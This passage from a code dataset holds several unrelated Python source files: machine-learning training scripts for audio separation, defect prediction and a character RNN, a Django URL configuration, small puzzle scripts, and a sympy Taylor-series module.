and add to a list\r\n for i in range(depth):\r\n ins = self.in_channels if i == 0 else outs\r\n outs = self.start_filts*(2**i)\r\n pooling = True if i < depth-1 else False\r\n\r\n down_conv = DownConv(ins, outs, pooling=pooling)\r\n self.down_convs.append(down_conv)\r\n\r\n # create the decoder pathway and add to a list\r\n # - careful! decoding only requires depth-1 blocks\r\n for i in range(depth-1):\r\n ins = outs\r\n outs = ins // 2\r\n up_conv = UpConv(ins, outs, up_mode=up_mode,\r\n merge_mode=merge_mode)\r\n self.up_convs.append(up_conv)\r\n\r\n self.conv_final = conv1x1(outs, self.num_classes)\r\n\r\n # add the list of modules to current module\r\n self.down_convs = nn.ModuleList(self.down_convs)\r\n self.up_convs = nn.ModuleList(self.up_convs)\r\n\r\n self.reset_params()\r\n\r\n @staticmethod\r\n def weight_init(m):\r\n if isinstance(m, nn.Conv2d):\r\n nn.init.xavier_normal_(m.weight)\r\n nn.init.constant_(m.bias, 0)\r\n\r\n\r\n def reset_params(self):\r\n for i, m in enumerate(self.modules()):\r\n self.weight_init(m)\r\n\r\n\r\n def forward(self, x):\r\n encoder_outs = []\r\n\r\n # encoder pathway, save outputs for merging\r\n for i, module in enumerate(self.down_convs):\r\n x, before_pool = module(x)\r\n encoder_outs.append(before_pool)\r\n\r\n for i, module in enumerate(self.up_convs):\r\n before_pool = encoder_outs[-(i+2)]\r\n x = module(before_pool, x)\r\n\r\n # Note that this is only going to give a mask- we need to apply that mask to the audio before we can compare to the GT.\r\n x = self.conv_final(x)\r\n #was torch.tanh(x)\r\n x = torch.sigmoid(x)\r\n return x\r\n\r\n#load the data\r\n\r\nn_fft = 1023\r\nhop_sz = int((n_fft+1)/2)\r\nwindow_fn = torch.hann_window(n_fft)\r\n\r\n#takes in a filepath, returns a 512x512xN tensor of stft frames\r\ndef split_wav(filepath):\r\n wavData,fs = torchaudio.load(filepath)\r\n wavData = torch.mean(wavData, dim=0)\r\n\r\n complex_mix = torch.stft(wavData, n_fft = n_fft, hop_length = hop_sz, window = window_fn)\r\n complex_mix_pow = complex_mix.pow(2).sum(-1)\r\n complex_mix_mag = torch.sqrt(complex_mix_pow)\r\n\r\n n_splits = (complex_mix_mag.size()[1]//hop_sz)\r\n\r\n complex_mix_mag = complex_mix_mag[:,0:n_splits*512]\r\n\r\n chunks = torch.chunk(complex_mix_mag,n_splits,1)\r\n stack = torch.stack(chunks,dim = 0)\r\n return stack\r\n\r\n\r\ndataset_path = \"D:/source_sep_data/musdb18hq/train\"\r\nn_files = 0\r\nfs = 0\r\npad = nn.ConstantPad1d((0,1),0)\r\nstart_time = time.time()\r\ncurr_song = \"none\"\r\ninput = \"mixture.wav\"\r\ngt = \"vocals.wav\"\r\n\r\n#make a list of all the files in the training set\r\nfiles_list = []\r\nfn_list = []\r\n#if counter is even, we can add fn_list to files_list\r\ncounter = 0\r\nfor dirpath, dirs, files in os.walk(dataset_path):\r\n for file in files:\r\n filepath = dirpath + os.sep + file\r\n #we always want mixture last!\r\n #if file == gt or file == input:\r\n if file == gt or file == input:\r\n fn_list.append(file)\r\n counter = counter + 1\r\n\r\n if counter%2 == 0 and len(fn_list) > 0:\r\n idx = fn_list.index(gt)\r\n gt_filepath = dirpath + os.sep + fn_list[idx]\r\n files_list.append(gt_filepath)\r\n fn_list.pop(idx)\r\n input_filepath = dirpath + os.sep + fn_list[0]\r\n files_list.append(input_filepath)\r\n fn_list.pop(0)\r\n #files_list.append(filepath)\r\n\r\n#give input and gt filenames one song at a time\r\ndef get_next_song(curr_song):\r\n if curr_song == \"start\":\r\n retval = [files_list[0],files_list[1]]\r\n elif files_list.index(curr_song) < len(files_list)-1:\r\n retval = [files_list[files_list.index(curr_song)+1], files_list[files_list.index(curr_song)+2]]\r\n else:\r\n retval = []\r\n return retval\r\n\r\ndef mean(list):\r\n return sum(list)/len(list)\r\n\r\n#run the data through the model\r\n\r\nnetwork = UNet(1,1)\r\nnetwork.cuda()\r\nnetwork.train()\r\n\r\nloss_fn = nn.MSELoss()\r\ncriterion = torch.optim.Adam(network.parameters(), lr = .0001, betas = (.5,.999))\r\n\r\nepoch_counter = 1\r\nkeep_training = True\r\nwhile keep_training:\r\n epoch_losses = []\r\n start_time = time.time()\r\n curr_song = [\"junk\",\"start\"]\r\n\r\n #while there are more training examples:\r\n while get_next_song(curr_song[1]) != []:\r\n #this line is a problem\r\n print(curr_song[1])\r\n curr_song = get_next_song(curr_song[1])\r\n gt = split_wav(curr_song[0]).cuda()\r\n input = split_wav(curr_song[1]).cuda()\r\n #print(input.size())\r\n\r\n for input_ary, gt_ary in zip(input,gt):\r\n\r\n #print(input_ary.size())\r\n #print(gt_ary.size())\r\n network.zero_grad()\r\n\r\n model_output = network(input_ary.unsqueeze(0).unsqueeze(0))\r\n #print(torch.max(model_output))\r\n #print(torch.min(model_output))\r\n\r\n output_spec = input_ary * model_output\r\n\r\n loss = loss_fn(output_spec, gt_ary.unsqueeze(0).unsqueeze(0))\r\n loss.backward()\r\n criterion.step()\r\n\r\n epoch_losses.append(loss.item())\r\n\r\n print(\"Epoch {} finished! Average Loss: {}, Total Time: {}\".format(epoch_counter,mean(epoch_losses),time.time()-start_time))\r\n\r\n if epoch_counter > 3:\r\n print(\"Training Finished!\")\r\n keep_training = False\r\n\r\n epoch_counter = epoch_counter + 1\r\n","sub_path":"spectral_network.py","file_name":"spectral_network.py","file_ext":"py","file_size_in_byte":11994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196870656","text":"def pig_it(text):\n t = text.split()\n atinlay = []\n for word in t:\n l = word[:1]\n pituus = len(word)\n atinlay.append(''.join((word[1:pituus],l,'ay')))\n return ' '.join(atinlay)\n\n\npig_it('Pig latin is cool')\n\n","sub_path":"python training/pig_it.py","file_name":"pig_it.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"385683042","text":"import numpy as np\n\nm = 0\nn = 0\nwith open(\"battleships_sample1p.txt\", \"r\") as p0:\n\theader = p0.readline()\n\tsize = header.split()\n\tm = int(size[0])\n\tn = int(size[1])\n\np = open(\"result.txt\", \"r\")\nq = open(\"battleships.csp\", \"a\")\n\nprint(\"(not (&& \", end=\"\",file=q)\nfor i in range(0, m*n):\n\tline = p.readline()\n\two = line.split()\n\tprint(\"(= {0} {1}) \".format(wo[1],wo[2]),end=\"\",file=q)\n\nprint(\") )\",file=q)\n\np.close()\nq.close()\n","sub_path":"Battleships/uniqueness.py","file_name":"uniqueness.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"508128042","text":"import torch.utils.data as Data\nimport datetime\nimport itertools\nimport torch.optim as optim\nimport torch\nimport models.CNN as CNN\nimport torch.nn as nn\n\nfrom tool.imblearn.over_sampling import RandomOverSampler\nfrom CNN_Test import *\nfrom ParsingSource import *\nfrom Tools import *\n\n\n# -------Auxiliary method--------Start\ndef init_record_data():\n record_data = {'Training Set': [], 'Test Set': [], 'Model': [], 'Embedding Dim': [], 'Number of Filter': [],\n 'Filter Size': [], 'Number of Hidden Nodes': [], 'Learning Rate': [], 'Momentun': [], 'L2 Weight': [],\n 'Dropout': [], 'Number of Epoch': [], 'Stride': [], 'Padding': [], 'Batch Size': [], 'Pool Size': [],\n 'Loop Size': [], 'accuracy_mean': [], 'accuracy_std': [], 'AUC_mean': [], 'AUC_std': [],\n 'F-measure_mean': [], 'F-measure_std': [], 'MCC_mean': [], 'MCC_std': []}\n return record_data\n\n\ndef insert_param(training, test, model_name, nn_params, loop_size, data):\n data['Training Set'].append(training)\n data['Test Set'].append(test)\n data['Model'].append(model_name)\n\n data['Embedding Dim'].append(nn_params['EMBED_DIM'])\n data['Number of Filter'].append(nn_params['N_FILTER'])\n data['Filter Size'].append(nn_params['FILTER_SIZE'])\n data['Number of Hidden Nodes'].append(nn_params['N_HIDDEN_NODE'])\n data['Learning Rate'].append(nn_params['LEARNING_RATE'])\n data['Momentun'].append(nn_params['MOMEMTUN'])\n data['L2 Weight'].append(nn_params['L2_WEIGHT'])\n data['Dropout'].append(nn_params['DROPOUT'])\n data['Number of Epoch'].append(nn_params['N_EPOCH'])\n data['Stride'].append(nn_params['STRIDE'])\n data['Padding'].append(nn_params['PADDING'])\n data['Batch Size'].append(nn_params['BATCH_SIZE'])\n data['Pool Size'].append(nn_params['POOL_SIZE'])\n\n data['Loop Size'].append(str(loop_size))\n\n\ndef insert_result(acc_m, acc_s, auc_m, auc_s, f1_m, f1_s, mcc_m, mcc_s, data):\n data['accuracy_mean'].append(round(acc_m, 3))\n data['accuracy_std'].append(round(acc_s, 3))\n data['AUC_mean'].append(round(auc_m, 3))\n data['AUC_std'].append(round(auc_s, 3))\n data['F-measure_mean'].append(round(f1_m, 3))\n data['F-measure_std'].append(round(f1_s, 3))\n data['MCC_mean'].append(round(mcc_m, 3))\n data['MCC_std'].append(round(mcc_s, 3))\n\n\ndef save_data(file_name, training, test, data):\n df = pd.DataFrame(data=data,\n columns=['Training Set', 'Test Set', 'Model', 'Embedding Dim', 'Number of Filter', 'Filter Size',\n 'Number of Hidden Nodes', 'Learning Rate', 'Momentun', 'L2 Weight', 'Dropout', 'Number of Epoch',\n 'Stride', 'Padding', 'Batch Size', 'Pool Size', 'Loop Size', 'accuracy_mean',\n 'accuracy_std', 'AUC_mean', 'AUC_std', 'F-measure_mean', 'F-measure_std', 'MCC_mean', 'MCC_std'])\n\n save_path = 'result/' + file_name + '.csv'\n if os.path.exists(save_path):\n df.to_csv(save_path, mode='a', header=False, index=False)\n else:\n df.to_csv(save_path, mode='w', index=False)\n\n\ndef calculate_save_data(model_name, path0, path1, nn_params, LOOP_SIZE, acc, auc, f1, mcc):\n # Calculate the mean and standard deviation\n acc, auc, f1, mcc = np.array(acc), np.array(auc), np.array(f1), np.array(mcc)\n acc_m, acc_s, auc_m, auc_s, f1_m, f1_s, mcc_m, mcc_s = acc.mean(), acc.std(), auc.mean(), auc.std(), f1.mean(), f1.std(), mcc.mean(), mcc.std()\n\n # Save the results in a file\n record_data = init_record_data()\n insert_result(acc_m, acc_s, auc_m, auc_s, f1_m, f1_s, mcc_m, mcc_s, data=record_data)\n insert_param(training=path0, test=path1, model_name=model_name, nn_params=nn_params, loop_size=LOOP_SIZE, data=record_data)\n save_data(result_file_name, path0, path1, record_data)\n\n# -------Auxiliary method--------end\n\n# Initial superparameter of convolutional networks\ninit_cnn_params = {'EMBED_DIM': 30, 'N_FILTER': 10, 'FILTER_SIZE': 5, 'N_HIDDEN_NODE': 100, 'N_EPOCH': 15, 'BATCH_SIZE': 32, 'LEARNING_RATE': 1e-5,\n 'MOMEMTUN': 0.9, 'L2_WEIGHT': 0.005, 'DROPOUT': 0.5, 'STRIDE': 1, 'PADDING': 0, 'POOL_SIZE': 2, 'DICT_SIZE': 0, 'TOKEN_SIZE': 0}\n\n# Adjustable parameter\nREGENERATE = False\ndump_data_path = 'data/balanced_dump_data_1549189395/'\nresult_file_name = 'CNN Result'\nLOOP_SIZE = 1 # 20\n\nopt_node = [100]\nopt_batchsize = [32]\nopt_epoch = [15] # 15\nopt_learning_rate = [1e-5]\n\n# Fixed parameter\nIMBALANCE_PROCESSOR = RandomOverSampler() # RandomOverSampler(), RandomUnderSampler(), None, 'cost'\nHANDCRAFT_DIM = 20\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nroot_path_source = 'data/projects/'\nroot_path_csv = 'data/csvs/'\npackage_heads = ['org', 'gnu', 'bsh', 'javax', 'com']\n\n# Start time\nstart_time = datetime.datetime.now()\nstart_time_str = start_time.strftime('%Y-%m-%d_%H.%M.%S')\n\n# Get a list of source and target projects\npath_train_and_test = []\nwith open('data/pairs-one.txt', 'r') as file_obj:\n for line in file_obj.readlines():\n line = line.strip('\\n')\n line = line.strip(' ')\n path_train_and_test.append(line.split(','))\n\n# Loop each pair of combinations\nfor path in path_train_and_test:\n\n # Get file\n path_train_source = root_path_source + path[0]\n path_train_handcraft = root_path_csv + path[0] + '.csv'\n path_test_source = root_path_source + path[1]\n path_test_handcraft = root_path_csv + path[1] + '.csv'\n\n # Regenerate token or get from dump_data\n print(path[0] + \"===\" + path[1])\n train_project_name = path_train_source.split('/')[2]\n test_project_name = path_test_source.split('/')[2]\n path_train_and_test_set = dump_data_path + train_project_name + '_to_' + test_project_name\n # If you don't need to regenerate, get it directly from dump_data\n if os.path.exists(path_train_and_test_set) and not REGENERATE:\n obj = load_data(path_train_and_test_set)\n [train_ast, train_hand_craft, train_label, test_ast, test_hand_craft, test_label, vector_len, vocabulary_size] = obj\n else:\n # Get a list of instances of the training and test sets\n train_file_instances = extract_handcraft_instances(path_train_handcraft)\n test_file_instances = extract_handcraft_instances(path_test_handcraft)\n\n # Get tokens\n dict_token_train = parse_source(path_train_source, train_file_instances, package_heads)\n dict_token_test = parse_source(path_test_source, test_file_instances, package_heads)\n\n # Turn tokens into numbers\n list_dict, vector_len, vocabulary_size = transform_token_to_number([dict_token_train, dict_token_test])\n dict_encoding_train = list_dict[0]\n dict_encoding_test = list_dict[1]\n\n # Take out data that can be used for training\n train_ast, train_hand_craft, train_label = extract_data(path_train_handcraft, dict_encoding_train)\n test_ast, test_hand_craft, test_label = extract_data(path_test_handcraft, dict_encoding_test)\n\n # Imbalanced processing\n train_ast, train_hand_craft, train_label = imbalance_process(train_ast, train_hand_craft, train_label, IMBALANCE_PROCESSOR)\n\n # Saved to dump_data\n obj = [train_ast, train_hand_craft, train_label, test_ast, test_hand_craft, test_label, vector_len, vocabulary_size]\n dump_data(path_train_and_test_set, obj)\n\n # ZScore\n train_hand_craft = (train_hand_craft - np.mean(train_hand_craft, axis=0)) / np.std(train_hand_craft, axis=0)\n test_hand_craft = (test_hand_craft - np.mean(test_hand_craft, axis=0)) / np.std(test_hand_craft, axis=0)\n\n # Data from numpy to tensor\n train_ast = torch.Tensor(train_ast).to(DEVICE)\n test_ast = torch.Tensor(test_ast).to(DEVICE)\n\n # Select nn parameters\n nn_params = init_cnn_params.copy()\n nn_params['DICT_SIZE'] = vocabulary_size + 1\n nn_params['TOKEN_SIZE'] = vector_len\n\n train_dataset = Data.TensorDataset(train_ast, torch.Tensor(train_label).to(DEVICE))\n # nn_params['BATCH_SIZE'] = len(train_ast) # 用full size batch\n\n for batch_size in opt_batchsize:\n # Manufacture loader according to different batchsize\n loader = Data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n\n for params_i in itertools.product(opt_node, opt_epoch, opt_learning_rate):\n # Select nn parameters\n nn_params['N_HIDDEN_NODE'] = params_i[0]\n nn_params['N_EPOCH'] = params_i[1]\n nn_params['LEARNING_RATE'] = params_i[2]\n\n # ------------------ CNN training begins ------------------\n CNN_acc, CNN_auc, CNN_f1, CNN_mcc = [], [], [], []\n DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc = [], [], [], []\n for l in range(LOOP_SIZE):\n model = CNN.CNN(nn_params)\n model.to(DEVICE)\n\n # Train\n init_lr = nn_params['LEARNING_RATE']\n for epoch in range(nn_params['N_EPOCH']):\n # Optimizer is Adam\n optimizer = optim.Adam(model.parameters(), lr=init_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=nn_params['L2_WEIGHT'], amsgrad=False)\n # lr = init_lr / math.pow((1 + 10 * (epoch - 1) / cnn_params['N_EPOCH']), 0.75)\n # optimizer = optim.SGD(model.parameters(), lr=lr, momentum=cnn_params['MOMEMTUN'], weight_decay=cnn_params['L2_WEIGHT'])\n\n total_loss_train = 0\n for step, (batch_ast_x, batch_y) in enumerate(loader):\n print('epoch - step ' + str(epoch) + ' - ' + str(step))\n model.train()\n y_score, y_pred, features = model(batch_ast_x)\n\n criterion = nn.BCELoss().to(DEVICE)\n batch_y = batch_y.float()\n loss = criterion(y_score, batch_y)\n print('loss: ' + str(loss))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n total_loss_train += loss.data\n\n res_e = 'Epoch: [{}/{}], training loss: {:.6f}'.format(epoch, nn_params['N_EPOCH'], total_loss_train / len(loader))\n print(res_e)\n\n # CNN\n model_name = 'CNN'\n CNN_acc, CNN_auc, CNN_f1, CNN_mcc = CNN_test(model_name, model, train_ast, test_ast, train_label, test_label, train_hand_craft,\n test_hand_craft, CNN_acc, CNN_auc, CNN_f1, CNN_mcc)\n\n # DPCNN\n model_name = 'DPCNN'\n DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc = CNN_test(model_name, model, train_ast, test_ast, train_label, test_label, train_hand_craft,\n test_hand_craft, DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc)\n\n # The result is calculated and stored in the file\n calculate_save_data('CNN', path[0], path[1], nn_params, LOOP_SIZE, CNN_acc, CNN_auc, CNN_f1, CNN_mcc)\n calculate_save_data('DPCNN', path[0], path[1], nn_params, LOOP_SIZE, DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc)\n # ------------------ Training End ------------------\n\n# End time\nend_time = datetime.datetime.now()\nprint(end_time - start_time)\n","sub_path":"run_cnn.py","file_name":"run_cnn.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381251757","text":"# coding: utf-8\nfrom __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport os\nimport config as cfg\n\ndef pick_top_n(preds, vocab_size, top_n=5):\n p = np.squeeze(preds)\n # 将除了top_n个预测值的位置都置为0\n p[np.argsort(p)[:-top_n]] = 0\n # 归一化概率\n p = p / np.sum(p)\n # 随机选取一个字符\n c = np.random.choice(vocab_size, 1, p=p)[0]\n return c\n\n\nclass CharRNN(object):\n def __init__(self, num_classes, isTraining = True, grad_clip=5):\n if isTraining:\n num_seqs, num_steps = cfg.batch_size, cfg.char_length\n else:\n num_seqs, num_steps = 1, 1\n\n self.num_classes = num_classes\n self.num_seqs = num_seqs\n self.num_steps = num_steps\n self.lstm_size = cfg.lstm_size\n self.num_layers = cfg.num_layers\n self.use_embedding = cfg.use_embedding\n self.embedding_size = cfg.embedding_size\n\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n if isTraining:\n self.inputs = tf.placeholder(tf.int32, shape=(self.num_seqs, self.num_steps), name='inputs')\n self.outputs = tf.placeholder(tf.int32, shape=(self.num_seqs, self.num_steps), name='outputs')\n else:\n self.inputs = tf.placeholder(tf.int32, shape=(1, 1), name='inputs')\n\n # 对于中文,需要使用embedding层, 英文字母没有必要用embedding层\n if self.use_embedding is False:\n lstm_inputs = tf.one_hot(self.inputs, self.num_classes)\n else:\n embedding = tf.get_variable('embedding', initializer = tf.random_uniform(\n [self.num_classes, self.embedding_size], -1.0, 1.0))\n lstm_inputs = tf.nn.embedding_lookup(embedding, self.inputs)\n\n self.final_state, self.logits, self.prob = self.build_lstm(lstm_inputs)\n if isTraining:\n self.loss = self.build_loss(self.logits, self.outputs)\n\n def build_lstm(self, inputs):\n # 创建单个cell并堆叠多层\n def get_a_cell(lstm_size, keep_prob):\n lstm = tf.nn.rnn_cell.BasicLSTMCell(lstm_size)\n drop = tf.nn.rnn_cell.DropoutWrapper(lstm, output_keep_prob=keep_prob)\n return drop\n\n cell = tf.nn.rnn_cell.MultiRNNCell(\n [get_a_cell(self.lstm_size, self.keep_prob) for _ in range(self.num_layers)]\n )\n initial_state = cell.zero_state(self.num_seqs, tf.float32)\n\n # 通过dynamic_rnn对cell展开时间维度\n lstm_outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, initial_state=initial_state)\n\n # 通过lstm_outputs得到概率\n seq_output = tf.concat(lstm_outputs, 1)\n x = tf.reshape(seq_output, [-1, self.lstm_size])\n\n softmax_w = tf.Variable(tf.truncated_normal([self.lstm_size, self.num_classes], stddev=0.1))\n softmax_b = tf.Variable(tf.zeros(self.num_classes))\n\n logits = tf.matmul(x, softmax_w) + softmax_b\n proba_prediction = tf.nn.softmax(logits, name='predictions')\n\n return final_state, logits, proba_prediction\n\n def build_loss(self, predict, label):\n y_one_hot = tf.one_hot(label, self.num_classes)\n y_reshaped = tf.reshape(y_one_hot, predict.get_shape())\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=predict, labels=y_reshaped)\n loss = tf.reduce_mean(loss)\n return loss\n\n def build_optimizer(self):\n # 使用clipping gradients\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(self.loss, tvars), self.grad_clip)\n train_op = tf.train.AdamOptimizer(self.learning_rate)\n self.optimizer = train_op.apply_gradients(zip(grads, tvars))\n\n def train(self, batch_generator, max_steps, save_path, save_every_n, log_every_n):\n self.session = tf.Session()\n with self.session as sess:\n sess.run(tf.global_variables_initializer())\n # Train network\n step = 0\n new_state = sess.run(self.initial_state)\n\n for x, y in batch_generator:\n step += 1\n start = time.time()\n feed = {self.inputs: x,\n self.targets: y,\n self.keep_prob: self.train_keep_prob,\n self.initial_state: new_state}\n batch_loss, new_state, _ = sess.run([self.loss,\n self.final_state,\n self.optimizer],\n feed_dict=feed)\n\n end = time.time()\n # control the print lines\n if step % log_every_n == 0:\n print('step: {}/{}... '.format(step, max_steps),\n 'loss: {:.4f}... '.format(batch_loss),\n '{:.4f} sec/batch'.format((end - start)))\n if (step % save_every_n == 0):\n self.saver.save(sess, os.path.join(save_path, 'model'), global_step=step)\n if step >= max_steps:\n break\n self.saver.save(sess, os.path.join(save_path, 'model'), global_step=step)\n\n def sample(self, n_samples, prime, vocab_size):\n samples = [c for c in prime]\n sess = self.session\n new_state = sess.run(self.initial_state)\n preds = np.ones((vocab_size, )) # for prime=[]\n for c in prime:\n x = np.zeros((1, 1))\n # 输入单个字符\n x[0, 0] = c\n feed = {self.inputs: x,\n self.keep_prob: 1.,\n self.initial_state: new_state}\n preds, new_state = sess.run([self.proba_prediction, self.final_state],\n feed_dict=feed)\n\n c = pick_top_n(preds, vocab_size)\n # 添加字符到samples中\n samples.append(c)\n\n # 不断生成字符,直到达到指定数目\n for i in range(n_samples):\n x = np.zeros((1, 1))\n x[0, 0] = c\n feed = {self.inputs: x,\n self.keep_prob: 1.,\n self.initial_state: new_state}\n preds, new_state = sess.run([self.proba_prediction, self.final_state],\n feed_dict=feed)\n\n c = pick_top_n(preds, vocab_size)\n samples.append(c)\n\n return np.array(samples)\n\n def load(self, checkpoint):\n self.session = tf.Session()\n self.saver.restore(self.session, checkpoint)\n print('Restored from: {}'.format(checkpoint))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525377913","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'usuarios.views.ingresar'), \n url(r'^contact-us/', TemplateView.as_view(template_name=\"twitter/contact_form.html\")),\n url(r'^registrate/', 'usuarios.views.register'),\n url(r'^registrate/', TemplateView.as_view(template_name=\"twitter/register.html\")),\n url(r'^login/$', 'usuarios.views.ingresar'),\n url(r'^twitter/logout/$', 'usuarios.views.logout'),\n url(r'^twitter/logout/', TemplateView.as_view(template_name=\"twitter/logout.html\")),\n url(r'^perfil/', 'micropost.views.ver_perfil'),\n url(r'^modperfil/$', 'usuarios.views.perfil'),\n url(r'^modperfil/', TemplateView.as_view(template_name=\"twitter/perfil.html\")), \n url(r'^login/listar_usu/', 'usuarios.views.mostrar_usuarios'),\n url(r'^login/eliminar_usu/(\\d+)/$', 'usuarios.views.eliminar_usuarios'),\n #Micropost\n url(r'^microposts/$','micropost.views.new'),\n url(r'^microposts/mi_post/$', 'micropost.views.ver_mis_post'),\n url(r'^login/follow/(\\d+)/$', 'usuarios.views.follow'),\n url(r'^login/unfollow/(\\d+)/$', 'usuarios.views.unfollow'),\n url(r'^micropost/borrar/(\\d+)/$', 'micropost.views.borrar_post'),\n url(r'^perfil_usu/(\\d+)/$', 'usuarios.views.mostrar_perfil'),\n url(r'^activo/', TemplateView.as_view(template_name=\"twitter/noactivo.html\")),\n url(r'^about/', TemplateView.as_view(template_name=\"twitter/about.html\")),\n\n)","sub_path":"twitter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357800917","text":"from sympy.polys.lpoly import *\nfrom sympy import *\nfrom sympy.core import C\n\nclass TaylorEvalError(TypeError):\n pass\n\n\ndef ev_args(te,a):\n if len(a) == 1:\n a = a[0]\n if a == te.var:\n return te.lvar\n if isinstance(a, Number):\n return te.coerce_number(a)\n return te(a)\n else:\n raise NotImplementedError\n\ndef taylor(p,var=None,start=0,prec=6,dir=\"+\",pol_pars=[],ov=True):\n \"\"\"\n taylor series expansion of p\n kept the same arguments as series, with the addition\n of pol_pars\n var series variable\n start var=start point of expansion\n prec precision of the series\n dir ... \n pol_pars polynomial parameters\n ov = True return always the series in expanded form\n ov = return a series which must be expanded to be put in canonical\n form; this is faster\n\n ALGORITHM try first to compute the series in the\n QQ ring; if this fails compute it\n in the symbolic ring SR consisting\n of the sympy expressions which do not depend on\n var and pol_pars; if also this fails compute it\n using the series function\n\n EXAMPLES\n\n >>> from sympy import *\n >>> from sympy.polys.ltaylor import taylor\n >>> x,y = symbols('x,y')\n >>> taylor(sin(x*tan(x)),x,0,10)\n x**2 + x**4/3 - x**6/30 - 71*x**8/630 + O(x**10)\n\n >>> taylor(sqrt(1 + x*sin(pi*x)),x,0,6)\n 1 + x**4*(-pi**2/8 - pi**3/12) + pi*x**2/2 + O(x**6)\n\n >>> taylor(exp(x*log(x)),x,0,3)\n 1 + x*log(x) + x**2*log(x)**2/2 + O(x**3*log(x)**3)\n\n In these examples y is first treated internally\n as a Sympy symbol, then as a polynomial parameter;\n the latter version is faster\n\n >>> taylor(atan(x*y + x**2),x,0,5)\n x*y + x**2 - x**4*y**2 - x**3*y**3/3 + O(x**5)\n >>> taylor(atan(x*y + x**2),x,0,5,pol_pars=[y])\n x*y + x**2 - x**4*y**2 - x**3*y**3/3 + O(x**5)\n \"\"\"\n\n if var == None or prec == None or dir != \"+\" or \\\n prec in [S.Infinity, S.NegativeInfinity]:\n return series(p,var,start,prec)\n # case with ov=True; for ov=False taylor is faster than for ov=True\n # tan(x) 100 taylor 50% faster \n # 200 taylor 20% faster\n # 1000 series 3x faster (chosen series for this)\n if prec > 70 and ov:\n head = p.__class__\n if head in [tan,acos,asin]:\n q = p.args[0]\n if q == var:\n return series(p,var,start,prec)\n if q.__class__ == Mul:\n if var in q.args:\n b = 1\n ni = q.args.index(var)\n for i in range(len(q.args)):\n if i != ni and isinstance(q.args[i],Number):\n b = 0\n break\n if b:\n return series(p,var,start,prec)\n if start:\n p0 = p\n p = p.subs(var,var+start)\n gens = [var] + pol_pars\n for ring in [QQ, sympify]:\n te = TaylorEval(gens, ring, prec)\n try:\n p1 = te(p)\n lp = p1.lp\n p1 = p1.tobasic(*gens)\n #args = list(p1._args + (O(var**prec),))\n #p1._args = tuple(args)\n # in the symbolic ring case one must expand\n # because the coefficients are often not expanded\n # TODO expand the coefficients\n if lp.SR:\n p1 = p1.expand()\n if ov:\n p1 = p1 + O(var**prec)\n return p1\n except TaylorEvalError:\n continue\n except NotImplementedError:\n continue\n #print 'DB5 used series',p\n if start:\n p = p0\n p1 = series(p,var,start,prec)\n return p1\n\n\n\nclass TaylorEval:\n def __init__(self,gens,ring,prec):\n \"\"\"gens[0] is the series variable\n\n \"\"\"\n self.prec = prec\n self.gens = gens\n self.var = gens[0]\n self.ngens = len(gens)\n # try first with ring QQ\n self.ring = ring\n self.lp = LPoly(['X%d' % i for i in range(self.ngens)],ring,O_lex)\n self.lvname = 'X0'\n self.lgens = self.lp.gens()\n self.lvar = self.lgens[0]\n self.dgens = dict(zip(self.gens,self.lgens))\n\n def coerce_number(self, a):\n ring = self.ring\n if self.lp.SR:\n return a\n if isinstance(a, Rational):\n if ring == QQ:\n return QQ(a.p,a.q)\n return a\n else:\n raise TaylorEvalError\n\n\n def __call__(self,f):\n if isinstance(f, Number):\n return self.coerce_number(f)\n if f in self.gens:\n return self.dgens[f]\n\n head = f.__class__\n if head == Add:\n s = self.lp(0)\n for x in f.args:\n if self.var in x.atoms():\n x = self(x)\n elif x in self.gens:\n x = self.dgens[x]\n else:\n x = self.coerce_number(x)\n s += x\n return s\n if head == Mul:\n s = self.lp(1)\n for x in f.args:\n if self.var in x.atoms():\n x = self(x)\n s = s.mul_trunc(x,self.lvname,self.prec)\n elif x in self.gens:\n x = self.dgens[x]\n s = s.mul_trunc(x,self.lvname,self.prec)\n else:\n x = self.coerce_number(x)\n s = s*x\n return s\n if head == Pow:\n args = f.args\n pw = args[1]\n x = args[0]\n if self.var in x.atoms():\n x = self(x)\n if pw == int(pw):\n x1 = x.pow_trunc(pw,self.lvname,self.prec)\n else:\n if isinstance(pw, Rational):\n num = int(pw.p)\n den = int(pw.q)\n x1 = x.pow_trunc(num,self.lvname,self.prec)\n x1 = x1.nth_root(den,self.lvname,self.prec)\n else:\n raise NotImplementedError\n return x1\n x = self.coerce_number(x)\n return x\n if head == cos:\n q = ev_args(self,f.args)\n return q.cos(self.lvname,self.prec)\n if head == sin:\n q = ev_args(self,f.args)\n return q.sin(self.lvname,self.prec)\n if head == exp:\n q = ev_args(self,f.args)\n return q.exp(self.lvname,self.prec)\n if head == log:\n q = ev_args(self,f.args)\n return 